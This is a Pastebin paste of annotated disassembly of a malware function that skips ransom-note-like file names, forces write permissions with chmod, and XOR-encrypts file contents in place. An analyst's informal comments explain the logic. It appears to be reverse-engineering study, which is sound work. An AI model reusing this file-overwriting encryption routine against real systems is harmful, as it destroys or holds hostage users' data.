Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ┌ (fcn) func.homemade.encrypt_file_with_XOR 1565
- │ func.homemade.encrypt_file_with_XOR ();
- │ ; var int local_19058h @ rbp-0x19058
- │ ; var int local_19054h @ rbp-0x19054
- │ ; var int local_19050h @ rbp-0x19050
- │ ; var int local_19040h @ rbp-0x19040
- │ ; var int local_1903ch @ rbp-0x1903c
- │ ; var int local_19030h @ rbp-0x19030
- │ ; var int local_30h @ rbp-0x30
- │ ; CALL XREF from 0x10000212a (func.homemade.pick_random_key)
- │ ; DATA XREF from 0x100001985 (entry0)
- │ 0x100002160 55 push rbp
- │ 0x100002161 4889e5 mov rbp, rsp
- │ 0x100002164 4157 push r15
- │ 0x100002166 4156 push r14
- │ 0x100002168 4155 push r13
- │ 0x10000216a 4154 push r12
- │ 0x10000216c 53 push rbx
- │ 0x10000216d 4881ec389001. sub rsp, 0x19038
- │ 0x100002174 488b05850e00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0
- │ 0x10000217b 488b00 mov rax, qword [rax]
- │ 0x10000217e 488945d0 mov qword [local_30h], rax
- │ 0x100002182 488b1f mov rbx, qword [rdi]
- │ 0x100002185 4c8b6f08 mov r13, qword [rdi + 8] ; [0x8:8]=0x280000003
- │ 0x100002189 4889df mov rdi, rbx ; const char * s
- │ 0x10000218c e861070000 call sym.imp.strlen ; size_t strlen(const char *s)
- │ 0x100002191 48c1e020 shl rax, 0x20
- │ 0x100002195 48b900000000. movabs rcx, 0xffffffff00000000
- │ 0x10000219f 4801c1 add rcx, rax ; '#'
- │ 0x1000021a2 48c1f920 sar rcx, 0x20
- │ 0x1000021a6 803c0b5f cmp byte [rbx + rcx], 0x5f ; [0x5f:1]=0 ; '_'
- │ ┌─< 0x1000021aa 0f85c1010000 jne 0x100002371
- │ │ 0x1000021b0 48b900000000. movabs rcx, 0xfffffffe00000000
- │ │ 0x1000021ba 4801c1 add rcx, rax ; '#'
- │ │ 0x1000021bd 48c1f920 sar rcx, 0x20
- │ │ 0x1000021c1 803c0b45 cmp byte [rbx + rcx], 0x45 ; [0x45:1]=0 ; 'E'
- │ ┌──< 0x1000021c5 0f85a6010000 jne 0x100002371
- │ ││ 0x1000021cb 48b900000000. movabs rcx, 0xfffffffd00000000
- │ ││ 0x1000021d5 4801c1 add rcx, rax ; '#'
- │ ││ 0x1000021d8 48c1f920 sar rcx, 0x20
- │ ││ 0x1000021dc 803c0b4d cmp byte [rbx + rcx], 0x4d ; [0x4d:1]=0 ; 'M'
- │ ┌───< 0x1000021e0 0f858b010000 jne 0x100002371
- │ │││ 0x1000021e6 48b900000000. movabs rcx, 0xfffffffc00000000
- │ │││ 0x1000021f0 4801c1 add rcx, rax ; '#'
- │ │││ 0x1000021f3 48c1f920 sar rcx, 0x20
- │ │││ 0x1000021f7 803c0b44 cmp byte [rbx + rcx], 0x44 ; [0x44:1]=1 ; 'D'
- │ ┌────< 0x1000021fb 0f8570010000 jne 0x100002371
- │ ││││ 0x100002201 48b900000000. movabs rcx, 0xfffffffb00000000
- │ ││││ 0x10000220b 4801c1 add rcx, rax ; '#'
- │ ││││ 0x10000220e 48c1f920 sar rcx, 0x20
- │ ││││ 0x100002212 803c0b41 cmp byte [rbx + rcx], 0x41 ; [0x41:1]=0 ; 'A'
- │ ┌─────< 0x100002216 0f8555010000 jne 0x100002371
- │ │││││ 0x10000221c 48b900000000. movabs rcx, 0xfffffffa00000000
- │ │││││ 0x100002226 4801c1 add rcx, rax ; '#'
- │ │││││ 0x100002229 48c1f920 sar rcx, 0x20
- │ │││││ 0x10000222d 803c0b45 cmp byte [rbx + rcx], 0x45 ; [0x45:1]=0 ; 'E'
- │ ┌──────< 0x100002231 0f853a010000 jne 0x100002371
- │ ││││││ 0x100002237 48b900000000. movabs rcx, 0xfffffff900000000
- │ ││││││ 0x100002241 4801c1 add rcx, rax ; '#'
- │ ││││││ 0x100002244 48c1f920 sar rcx, 0x20
- │ ││││││ 0x100002248 803c0b52 cmp byte [rbx + rcx], 0x52 ; [0x52:1]=0 ; 'R'
- │ ┌───────< 0x10000224c 0f851f010000 jne 0x100002371
- │ │││││││ 0x100002252 48b900000000. movabs rcx, 0xfffffff800000000
- │ │││││││ 0x10000225c 4801c1 add rcx, rax ; '#'
- │ │││││││ 0x10000225f 48c1f920 sar rcx, 0x20
- │ │││││││ 0x100002263 803c0b5f cmp byte [rbx + rcx], 0x5f ; [0x5f:1]=0 ; '_'
- │ ────────< 0x100002267 0f8504010000 jne 0x100002371
- │ │││││││ 0x10000226d 48b900000000. movabs rcx, 0xfffffff700000000
- │ │││││││ 0x100002277 4801c8 add rax, rcx ; '&'
- │ │││││││ 0x10000227a 48c1f820 sar rax, 0x20
- │ │││││││ 0x10000227e 803c032e cmp byte [rbx + rax], 0x2e ; [0x2e:1]=90 ; '.' ; "ZERO"
- │ ────────< 0x100002282 0f85e9000000 jne 0x100002371
- │ │││││││ 0x100002288 660f6f05000d. movdqa xmm0, xmmword [0x100002f90]
- │ │││││││ 0x100002290 660f7f85b06f. movdqa xmmword [local_19050h], xmm0
- │ │││││││ 0x100002298 c785c06ffeff. mov dword [local_19040h], 0xf7ab8069
- │ │││││││ 0x1000022a2 c685c46ffeff. mov byte [local_1903ch], 0
- │ │││││││ 0x1000022a9 488dbdb06ffe. lea rdi, [local_19050h]
- │ │││││││ 0x1000022b0 e87bfcffff call func.homemade.decode_buffer
- │ │││││││ 0x1000022b5 31f6 xor esi, esi ; char* *endptr
- │ │││││││ 0x1000022b7 ba0a000000 mov edx, 0xa ; int base
- │ │││││││ 0x1000022bc 4889c7 mov rdi, rax ; const char * str
- │ │││││││ 0x1000022bf e834060000 call sym.imp.strtol ; long strtol(const char *str, char**endptr, int base)
- │ │││││││ 0x1000022c4 4989c6 mov r14, rax
- │ │││││││ 0x1000022c7 c785a86ffeff. mov dword [local_19058h], 0x2b6272 ; "rb+"
- │ │││││││ 0x1000022d1 488db5a86ffe. lea rsi, [local_19058h] ; const char*
- │ │││││││ 0x1000022d8 4889df mov rdi, rbx ; const char * filename
- │ │││││││ 0x1000022db e894050000 call sym.imp.fopen ; file*fopen(const char *filename,
- │ │││││││ 0x1000022e0 4989c7 mov r15, rax
- │ │││││││ 0x1000022e3 488dbdd06ffe. lea rdi, [local_19030h] ; void *ptr
- │ │││││││ 0x1000022ea be08000000 mov esi, 8 ; size_t
- │ │││││││ 0x1000022ef ba00320000 mov edx, 0x3200 ; size_t
- │ │││││││ 0x1000022f4 4c89f9 mov rcx, r15 ; FILE *stream
- │ │││││││ 0x1000022f7 e884050000 call sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
- │ │││││││ 0x1000022fc 4889c3 mov rbx, rax
- │ │││││││ 0x1000022ff 4885db test rbx, rbx
- │ ────────< 0x100002302 0f84e2030000 je 0x1000026ea
- │ │││││││ 0x100002308 4883fb03 cmp rbx, 3
- │ ────────< 0x10000230c 0f86bc030000 jbe 0x1000026ce
- │ │││││││ 0x100002312 4889d8 mov rax, rbx
- │ │││││││ 0x100002315 4883e0fc and rax, 0xfffffffffffffffc
- │ ────────< 0x100002319 0f84af030000 je 0x1000026ce
- │ │││││││ 0x10000231f 66490f6ec6 movq xmm0, r14
- │ │││││││ 0x100002324 660f70c044 pshufd xmm0, xmm0, 0x44
- │ │││││││ 0x100002329 488d50fc lea rdx, [rax - 4]
- │ │││││││ 0x10000232d 4889d1 mov rcx, rdx
- │ │││││││ 0x100002330 48c1e902 shr rcx, 2
- │ │││││││ 0x100002334 480fbae202 bt rdx, 2
- │ ────────< 0x100002339 0f82d6030000 jb 0x100002715
- │ │││││││ 0x10000233f 660f6f8dd06f. movdqa xmm1, xmmword [local_19030h]
- │ │││││││ 0x100002347 660fefc8 pxor xmm1, xmm0
- │ │││││││ 0x10000234b 660f6f95e06f. movdqa xmm2, xmmword [rbp - 0x19020]
- │ │││││││ 0x100002353 660fefd0 pxor xmm2, xmm0
- │ │││││││ 0x100002357 660f7f8dd06f. movdqa xmmword [local_19030h], xmm1
- │ │││││││ 0x10000235f 660f7f95e06f. movdqa xmmword [rbp - 0x19020], xmm2
- │ │││││││ 0x100002367 ba04000000 mov edx, 4
- │ ────────< 0x10000236c e9a6030000 jmp 0x100002717
- │ └└└└└└└─> 0x100002371 be02000000 mov esi, 2 ; if file is writable
- │ 0x100002376 4889df mov rdi, rbx
- │ 0x100002379 e8b4040000 call sym.imp.access
- │ 0x10000237e 85c0 test eax, eax
- │ ┌─< 0x100002380 742d je 0x1000023af
- │ │ 0x100002382 be01000000 mov esi, 1 ; if file is readable
- │ │ 0x100002387 4889df mov rdi, rbx
- │ │ 0x10000238a e8a3040000 call sym.imp.access
- │ │ 0x10000238f 85c0 test eax, eax
- │ ┌──< 0x100002391 7407 je 0x10000239a
- │ ││ 0x100002393 be80010000 mov esi, 0x180
- │ ┌───< 0x100002398 eb05 jmp 0x10000239f
- │ │└──> 0x10000239a bec0010000 mov esi, 0x1c0 ; int mode
- │ │ │ ; JMP XREF from 0x100002398 (func.homemade.encrypt_file_with_XOR)
- │ └───> 0x10000239f 4889df mov rdi, rbx ; const char * path try to chmod it
- │ │ 0x1000023a2 e8a3040000 call sym.imp.chmod ; int chmod(const char *path, int mode)
- │ │ 0x1000023a7 85c0 test eax, eax
- │ ┌──< 0x1000023a9 0f851c020000 jne 0x1000025cb
- │ │└─> 0x1000023af c785ac6ffeff. mov dword [local_19054h], 0x2b6272 ; successfully changed perms file is (now) writable
- open with rb+
- │ │ 0x1000023b9 488db5ac6ffe. lea rsi, [local_19054h] ; const char*
- │ │ 0x1000023c0 4889df mov rdi, rbx ; const char * filename
- │ │ 0x1000023c3 e8ac040000 call sym.imp.fopen ; file*fopen(const char *filename,
- │ │ 0x1000023c8 4989c4 mov r12, rax
- │ │ 0x1000023cb 488dbdd06ffe. lea rdi, [local_19030h] ; void *ptr
- │ │ 0x1000023d2 be08000000 mov esi, 8 ; size_t
- │ │ 0x1000023d7 ba00320000 mov edx, 0x3200 ; size_t
- │ │ 0x1000023dc 4c89e1 mov rcx, r12 ; FILE *stream
- │ │ 0x1000023df e89c040000 call sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
- │ │ 0x1000023e4 4889c3 mov rbx, rax
- │ │ 0x1000023e7 4885db test rbx, rbx
- │ │┌─< 0x1000023ea 0f848c000000 je 0x10000247c
- │ ││ 0x1000023f0 4883fb03 cmp rbx, 3 ; if 3 or less bytes read
- │ ┌───< 0x1000023f4 765b jbe 0x100002451
- │ │││ 0x1000023f6 4889d8 mov rax, rbx ; null last 4 bits of rax rerun last test
- │ │││ 0x1000023f9 4883e0fc and rax, 0xfffffffffffffffc
- │ ┌────< 0x1000023fd 7452 je 0x100002451
- │ ││││ 0x1000023ff 66490f6ec5 movq xmm0, r13 ; after extensive testing with -->pshufd.asm, I believe that this does absolutely nothing
- │ ││││ 0x100002404 660f70c044 pshufd xmm0, xmm0, 0x44
- │ ││││ 0x100002409 488d50fc lea rdx, [rax - 4]
- │ ││││ 0x10000240d 4889d1 mov rcx, rdx
- │ ││││ 0x100002410 48c1e902 shr rcx, 2
- │ ││││ 0x100002414 480fbae202 bt rdx, 2
- │ ┌─────< 0x100002419 0f82d4010000 jb 0x1000025f3
- │ │││││ 0x10000241f 660f6f8dd06f. movdqa xmm1, xmmword [local_19030h] ; xmm1 = buffer XOR r13
- xmm2 = passed variable on stack XOR r13
- xmm1 = unXORed buffer
- xmm2 = unXORed var
- completely useless (possibly junk code )
- │ │││││ 0x100002427 660fefc8 pxor xmm1, xmm0
- │ │││││ 0x10000242b 660f6f95e06f. movdqa xmm2, xmmword [rbp - 0x19020]
- │ │││││ 0x100002433 660fefd0 pxor xmm2, xmm0
- │ │││││ 0x100002437 660f7f8dd06f. movdqa xmmword [local_19030h], xmm1
- │ │││││ 0x10000243f 660f7f95e06f. movdqa xmmword [rbp - 0x19020], xmm2
- │ │││││ 0x100002447 ba04000000 mov edx, 4
- │ ┌──────< 0x10000244c e9a4010000 jmp 0x1000025f5
- │ ││└└───> 0x100002451 31c0 xor eax, eax
- │ ││ ┌───> 0x100002453 488d8cc5d06f. lea rcx, [rbp + rax*8 - 0x19030] ; if not tampered
- rdx = 0 (seriously wtf is going on?)
- │ ││ |││ 0x10000245b 4889da mov rdx, rbx
- │ ││ |││ 0x10000245e 4829c2 sub rdx, rax
- │ ││ |││ 0x100002461 666666666666. nop word cs:[rax + rax]
- │ ││┌────> 0x100002470 4c3129 xor qword [rcx], r13
- │ ││||││ 0x100002473 4883c108 add rcx, 8
- │ ││||││ 0x100002477 48ffca dec rdx
- │ ││└────< 0x10000247a 75f4 jne 0x100002470
- │ ││ ↑││ ; JMP XREF from 0x100002659 (func.homemade.encrypt_file_with_XOR)
- │ ││┌──└─> 0x10000247c 31f6 xor esi, esi ; if read succeeded and there are more than 3 bytes
- │ ││||│ 0x10000247e 31d2 xor edx, edx ; int
- │ ││||│ 0x100002480 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││||│ 0x100002483 e8fe030000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ ││||│ 0x100002488 488dbdd06ffe. lea rdi, [local_19030h] ; const void *ptr
- │ ││||│ 0x10000248f be08000000 mov esi, 8 ; size_t size
- │ ││||│ 0x100002494 4889da mov rdx, rbx ; size_t nitems
- │ ││||│ 0x100002497 4c89e1 mov rcx, r12 ; FILE *stream
- │ ││||│ 0x10000249a e8f3030000 call sym.imp.fwrite ; fwrite(cur_file, count, 8, local_19030h) ; size_t fwrite(const void *ptr, size_t size, size_t nitems, FILE *stream)
- │ ││||│ 0x10000249f 4881fb003200. cmp rbx, 0x3200
- │ ││||│┌─< 0x1000024a6 0f8517010000 jne 0x1000025c3
- │ ││||││ 0x1000024ac 31f6 xor esi, esi ; if the size of the file is exactly 102399 then stop (not sure why)
- this is bamboozlery of the highest degree: the arguments are loaded in the wrong order
- │ ││||││ 0x1000024ae ba02000000 mov edx, 2 ; int
- │ ││||││ 0x1000024b3 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││||││ 0x1000024b6 e8cb030000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ ││||││ 0x1000024bb 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││||││ 0x1000024be e8c9030000 call sym.imp.ftell ; long ftell(FILE *stream)
- │ ││||││ 0x1000024c3 48050070feff add rax, 0xfffffffffffe7000
- │ ││||││ 0x1000024c9 483d00900100 cmp rax, 0x19000
- │ ││||││ 0x1000024cf bb00900100 mov ebx, 0x19000
- │ ││||││ 0x1000024d4 480f4ed8 cmovle rbx, rax
- │ ││||││ 0x1000024d8 4989de mov r14, rbx
- │ ││||││ 0x1000024db 49c1ee03 shr r14, 3
- │ ┌───────< 0x1000024df 0f84de000000 je 0x1000025c3
- │ │││||││ 0x1000024e5 4e8d3cf50000. lea r15, [r14*8] ; if the file passes yet another test
- seek to the beginning by doing SEEK_END - file_size (obfuscated or shitty programming, we'll never know)
- │ │││||││ 0x1000024ed 49f7df neg r15
- │ │││||││ 0x1000024f0 ba02000000 mov edx, 2 ; int
- │ │││||││ 0x1000024f5 4c89e7 mov rdi, r12 ; FILE *stream
- │ │││||││ 0x1000024f8 4c89fe mov rsi, r15 ; long
- │ │││||││ 0x1000024fb e886030000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ │││||││ 0x100002500 488dbdd06ffe. lea rdi, [local_19030h] ; void *ptr
- │ │││||││ 0x100002507 be08000000 mov esi, 8 ; size_t
- │ │││||││ 0x10000250c 4c89f2 mov rdx, r14 ; size_t
- │ │││||││ 0x10000250f 4c89e1 mov rcx, r12 ; FILE *stream
- │ │││||││ 0x100002512 e869030000 call sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
- │ │││||││ 0x100002517 4883fb1f cmp rbx, 0x1f
- │ ────────< 0x10000251b 7661 jbe 0x10000257e
- │ │││||││ 0x10000251d 48b8fcffffff. movabs rax, 0x1ffffffffffffffc ; -4
- │ │││||││ 0x100002527 4c21f0 and rax, r14
- │ ────────< 0x10000252a 7452 je 0x10000257e
- │ │││||││ 0x10000252c 66490f6ec5 movq xmm0, r13
- │ │││||││ 0x100002531 660f70c044 pshufd xmm0, xmm0, 0x44
- │ │││||││ 0x100002536 488d50fc lea rdx, [rax - 4]
- │ │││||││ 0x10000253a 4889d1 mov rcx, rdx
- │ │││||││ 0x10000253d 48c1e902 shr rcx, 2
- │ │││||││ 0x100002541 480fbae202 bt rdx, 2
- │ ────────< 0x100002546 0f8212010000 jb 0x10000265e
- │ │││||││ 0x10000254c 660f6f8dd06f. movdqa xmm1, xmmword [local_19030h]
- │ │││||││ 0x100002554 660fefc8 pxor xmm1, xmm0
- │ │││||││ 0x100002558 660f6f95e06f. movdqa xmm2, xmmword [rbp - 0x19020]
- │ │││||││ 0x100002560 660fefd0 pxor xmm2, xmm0
- │ │││||││ 0x100002564 660f7f8dd06f. movdqa xmmword [local_19030h], xmm1
- │ │││||││ 0x10000256c 660f7f95e06f. movdqa xmmword [rbp - 0x19020], xmm2
- │ │││||││ 0x100002574 ba04000000 mov edx, 4
- │ ────────< 0x100002579 e9e2000000 jmp 0x100002660
- │ ────────> 0x10000257e 31c0 xor eax, eax ; if TRUE! Fucking finally we get to the crypto
- │ ────────> 0x100002580 488d8cc5d06f. lea rcx, [rbp + rax*8 - 0x19030] ; rcx = start of buffer
- rdx is how far is left to go
- │ │││||││ 0x100002588 4c89f2 mov rdx, r14
- │ │││||││ 0x10000258b 4829c2 sub rdx, rax
- │ │││||││ 0x10000258e 6690 nop
- │ ────────> 0x100002590 4c3129 xor qword [rcx], r13 ; xor the buffer by r13, 8 bytes at a time
- │ │││||││ 0x100002593 4883c108 add rcx, 8
- │ │││||││ 0x100002597 48ffca dec rdx
- │ ────────< 0x10000259a 75f4 jne 0x100002590
- │ │││↑↑││ ; JMP XREF from 0x1000026c9 (func.homemade.encrypt_file_with_XOR)
- │ ────────> 0x10000259c ba02000000 mov edx, 2 ; int after seek to END - r15; write XORed buffer to overwrite original data
- │ │││||││ 0x1000025a1 4c89e7 mov rdi, r12 ; FILE *stream
- │ │││||││ 0x1000025a4 4c89fe mov rsi, r15 ; long
- │ │││||││ 0x1000025a7 e8da020000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ │││||││ 0x1000025ac 488dbdd06ffe. lea rdi, [local_19030h] ; const void *ptr
- │ │││||││ 0x1000025b3 be08000000 mov esi, 8 ; size_t size
- │ │││||││ 0x1000025b8 4c89f2 mov rdx, r14 ; size_t nitems
- │ │││||││ 0x1000025bb 4c89e1 mov rcx, r12 ; FILE *stream
- │ │││||││ 0x1000025be e8cf020000 call sym.imp.fwrite ; size_t fwrite(const void *ptr, size_t size, size_t nitems, FILE *stream)
- │ └─────└─> 0x1000025c3 4c89e7 mov rdi, r12 ; FILE *stream
- │ ││↑↑│ ; JMP XREF from 0x100002710 (func.homemade.encrypt_file_with_XOR)
- │ ││||│┌─> 0x1000025c6 e89d020000 call sym.imp.fclose ; int fclose(FILE *stream)
- │ ││||└──> 0x1000025cb 488b052e0a00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0 ; got here if we can't change perms on file
- │ ││|| | 0x1000025d2 488b00 mov rax, qword [rax]
- │ ││|| | 0x1000025d5 483b45d0 cmp rax, qword [local_30h]
- │ ││||┌──< 0x1000025d9 0f8599010000 jne 0x100002778
- │ ││||│| 0x1000025df 31c0 xor eax, eax
- │ ││||│| 0x1000025e1 4881c4389001. add rsp, 0x19038
- │ ││||│| 0x1000025e8 5b pop rbx
- │ ││||│| 0x1000025e9 415c pop r12
- │ ││||│| 0x1000025eb 415d pop r13
- │ ││||│| 0x1000025ed 415e pop r14
- │ ││||│| 0x1000025ef 415f pop r15
- │ ││||│| 0x1000025f1 5d pop rbp
- │ ││||│| 0x1000025f2 c3 ret
- │ │└─────> 0x1000025f3 31d2 xor edx, edx
- │ │ ↑↑│↑ ; JMP XREF from 0x10000244c (func.homemade.encrypt_file_with_XOR)
- │ └──────> 0x1000025f5 4885c9 test rcx, rcx ; rcx at this point is the sizeof the actual read left shifted by 2 (/4)
- │ ┌─────< 0x1000025f8 7456 je 0x100002650
- │ │||│| 0x1000025fa 4889c1 mov rcx, rax ; if it's too small EDIT: if it's NOT too small
- │ │||│| 0x1000025fd 4829d1 sub rcx, rdx
- │ │||│| 0x100002600 488d94d50070. lea rdx, [rbp + rdx*8 - 0x19000]
- │ │||│| 0x100002608 0f1f84000000. nop dword [rax + rax]
- | ┌──────> ;-- possible_xor_encrypt_of_file_buffer:
- │ ┌──────> 0x100002610 660f6f4ad0 movdqa xmm1, xmmword [rdx - 0x30] ; loop-di-loop more xmm instructions
- track xmm0: nothing gets loaded in and everything is XORed by it
- │ |│||│| 0x100002615 660fefc8 pxor xmm1, xmm0
- │ |│||│| 0x100002619 660f6f52e0 movdqa xmm2, xmmword [rdx - 0x20]
- │ |│||│| 0x10000261e 660fefd0 pxor xmm2, xmm0
- │ |│||│| 0x100002622 660f7f4ad0 movdqa xmmword [rdx - 0x30], xmm1
- │ |│||│| 0x100002627 660f7f52e0 movdqa xmmword [rdx - 0x20], xmm2
- │ |│||│| 0x10000262c 660f6f4af0 movdqa xmm1, xmmword [rdx - 0x10]
- │ |│||│| 0x100002631 660fefc8 pxor xmm1, xmm0
- │ |│||│| 0x100002635 660f6f12 movdqa xmm2, xmmword [rdx]
- │ |│||│| 0x100002639 660fefd0 pxor xmm2, xmm0
- │ |│||│| 0x10000263d 660f7f4af0 movdqa xmmword [rdx - 0x10], xmm1
- │ |│||│| 0x100002642 660f7f12 movdqa xmmword [rdx], xmm2
- │ |│||│| 0x100002646 4883c240 add rdx, 0x40 ; '@'
- │ |│||│| 0x10000264a 4883c1f8 add rcx, 0xfffffffffffffff8
- │ └──────< 0x10000264e 75c0 jne 0x100002610
- │ └─────> 0x100002650 4839c3 cmp rbx, rax ; after loop is done
- check against tampering? There is no way for rax (or rbx) to change since they were made equal
- │ |└───< 0x100002653 0f85fafdffff jne 0x100002453
- │ └────< 0x100002659 e91efeffff jmp 0x10000247c ; if tampered?
- │ ────────> 0x10000265e 31d2 xor edx, edx
- │ │↑ ; JMP XREF from 0x100002579 (func.homemade.encrypt_file_with_XOR)
- │ ────────> 0x100002660 4885c9 test rcx, rcx
- │ ┌───< 0x100002663 745b je 0x1000026c0
- │ ││| 0x100002665 4889c1 mov rcx, rax
- │ ││| 0x100002668 4829d1 sub rcx, rdx
- │ ││| 0x10000266b 488d94d50070. lea rdx, [rbp + rdx*8 - 0x19000]
- │ ││| 0x100002673 666666662e0f. nop word cs:[rax + rax]
- │ ┌────> 0x100002680 660f6f4ad0 movdqa xmm1, xmmword [rdx - 0x30]
- │ |││| 0x100002685 660fefc8 pxor xmm1, xmm0
- │ |││| 0x100002689 660f6f52e0 movdqa xmm2, xmmword [rdx - 0x20]
- │ |││| 0x10000268e 660fefd0 pxor xmm2, xmm0
- │ |││| 0x100002692 660f7f4ad0 movdqa xmmword [rdx - 0x30], xmm1
- │ |││| 0x100002697 660f7f52e0 movdqa xmmword [rdx - 0x20], xmm2
- │ |││| 0x10000269c 660f6f4af0 movdqa xmm1, xmmword [rdx - 0x10]
- │ |││| 0x1000026a1 660fefc8 pxor xmm1, xmm0
- │ |││| 0x1000026a5 660f6f12 movdqa xmm2, xmmword [rdx]
- │ |││| 0x1000026a9 660fefd0 pxor xmm2, xmm0
- │ |││| 0x1000026ad 660f7f4af0 movdqa xmmword [rdx - 0x10], xmm1
- │ |││| 0x1000026b2 660f7f12 movdqa xmmword [rdx], xmm2
- │ |││| 0x1000026b6 4883c240 add rdx, 0x40 ; '@'
- │ |││| 0x1000026ba 4883c1f8 add rcx, 0xfffffffffffffff8
- │ └────< 0x1000026be 75c0 jne 0x100002680
- │ └───> 0x1000026c0 4939c6 cmp r14, rax
- │ ────────< 0x1000026c3 0f85b7feffff jne 0x100002580
- │ ────────< 0x1000026c9 e9cefeffff jmp 0x10000259c
- │ ────────> 0x1000026ce 31c0 xor eax, eax
- │ ┌───> 0x1000026d0 488d8cc5d06f. lea rcx, [rbp + rax*8 - 0x19030]
- │ |│| 0x1000026d8 4889da mov rdx, rbx
- │ |│| 0x1000026db 4829c2 sub rdx, rax
- │ ┌────> 0x1000026de 4c3131 xor qword [rcx], r14
- │ ||│| 0x1000026e1 4883c108 add rcx, 8
- │ ||│| 0x1000026e5 48ffca dec rdx
- │ └────< 0x1000026e8 75f4 jne 0x1000026de
- │ ↑│↑ ; JMP XREF from 0x100002773 (func.homemade.encrypt_file_with_XOR)
- │ ───┌────> 0x1000026ea 31f6 xor esi, esi ; long
- │ ||│| 0x1000026ec 31d2 xor edx, edx ; int
- │ ||│| 0x1000026ee 4c89ff mov rdi, r15 ; FILE *stream
- │ ||│| 0x1000026f1 e890010000 call sym.imp.fseek ; int fseek(FILE *stream,
- │ ||│| 0x1000026f6 488dbdd06ffe. lea rdi, [local_19030h] ; const void *ptr
- │ ||│| 0x1000026fd be08000000 mov esi, 8 ; size_t size
- │ ||│| 0x100002702 4889da mov rdx, rbx ; size_t nitems
- │ ||│| 0x100002705 4c89f9 mov rcx, r15 ; FILE *stream
- │ ||│| 0x100002708 e885010000 call sym.imp.fwrite ; size_t fwrite(const void *ptr, size_t size, size_t nitems, FILE *stream)
- │ ||│| 0x10000270d 4c89ff mov rdi, r15
- │ ||│└─< 0x100002710 e9b1feffff jmp 0x1000025c6
- │ ────────> 0x100002715 31d2 xor edx, edx
- │ ↑↑│ ; JMP XREF from 0x10000236c (func.homemade.encrypt_file_with_XOR)
- │ ────────> 0x100002717 4885c9 test rcx, rcx
- │ ||│┌─< 0x10000271a 744e je 0x10000276a
- │ ||││ 0x10000271c 4889c1 mov rcx, rax
- │ ||││ 0x10000271f 4829d1 sub rcx, rdx
- │ ||││ 0x100002722 488d94d50070. lea rdx, [rbp + rdx*8 - 0x19000]
- │ ┌─────> 0x10000272a 660f6f4ad0 movdqa xmm1, xmmword [rdx - 0x30]
- │ |||││ 0x10000272f 660fefc8 pxor xmm1, xmm0
- │ |||││ 0x100002733 660f6f52e0 movdqa xmm2, xmmword [rdx - 0x20]
- │ |||││ 0x100002738 660fefd0 pxor xmm2, xmm0
- │ |||││ 0x10000273c 660f7f4ad0 movdqa xmmword [rdx - 0x30], xmm1
- │ |||││ 0x100002741 660f7f52e0 movdqa xmmword [rdx - 0x20], xmm2
- │ |||││ 0x100002746 660f6f4af0 movdqa xmm1, xmmword [rdx - 0x10]
- │ |||││ 0x10000274b 660fefc8 pxor xmm1, xmm0
- │ |||││ 0x10000274f 660f6f12 movdqa xmm2, xmmword [rdx]
- │ |||││ 0x100002753 660fefd0 pxor xmm2, xmm0
- │ |||││ 0x100002757 660f7f4af0 movdqa xmmword [rdx - 0x10], xmm1
- │ |||││ 0x10000275c 660f7f12 movdqa xmmword [rdx], xmm2
- │ |||││ 0x100002760 4883c240 add rdx, 0x40 ; '@'
- │ |||││ 0x100002764 4883c1f8 add rcx, 0xfffffffffffffff8
- │ └─────< 0x100002768 75c0 jne 0x10000272a
- │ ||│└─> 0x10000276a 4839c3 cmp rbx, rax
- │ |└───< 0x10000276d 0f855dffffff jne 0x1000026d0
- │ └────< 0x100002773 e972ffffff jmp 0x1000026ea
- └ └──> 0x100002778 e8af000000 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement